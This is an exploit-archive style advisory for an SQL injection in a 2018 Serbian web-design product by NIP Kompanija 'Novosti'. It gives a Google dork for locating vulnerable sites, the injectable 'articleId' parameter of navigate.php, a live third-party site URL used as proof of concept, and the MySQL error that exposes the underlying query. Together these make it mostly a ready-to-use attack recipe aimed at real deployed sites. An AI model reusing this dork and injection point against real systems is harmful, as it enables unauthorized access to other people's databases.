################################################################# # Exploit Title : NIP Kompanija "Novosti" A.D. Serbia Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Date : 30/12/2018 # Vendor Homepage : novosti.rs # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # Version Information : V1.0 - Nginx 1.7.6 - PHP 5.3.28 jQuery 1.8.3 - jQuery UI 1.8.2 # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060264 ################################################################# Copyright A(c) 1999-2005 NIP Kompanija "Novosti" A.D. Serbia SQL Injection Vulnerability ################################################################# # Google Dork : intext:''Copyright A(c) 1999-2005 NIP Kompanija "Novosti" A.D. All Rights Reserved.'' # Exploit : /PATH/navigate.php?Id=[ID-NUMBER]&editionId=[ID-NUMBER]&articleId=[SQL Inj] ################################################################# # biljeizdravlje.rs/code/navigate.php?Id=331&editionId=235&articleId=1107%27 # Proof of Concept for SQL Inj => archive.is/KEbox ################################################################# # SQL Database Error : MySQL ERROR (1064) - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND Valid = 1' at line 1 SELECT Naziv FROM Broj WHERE Id = AND Valid = 1 ################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################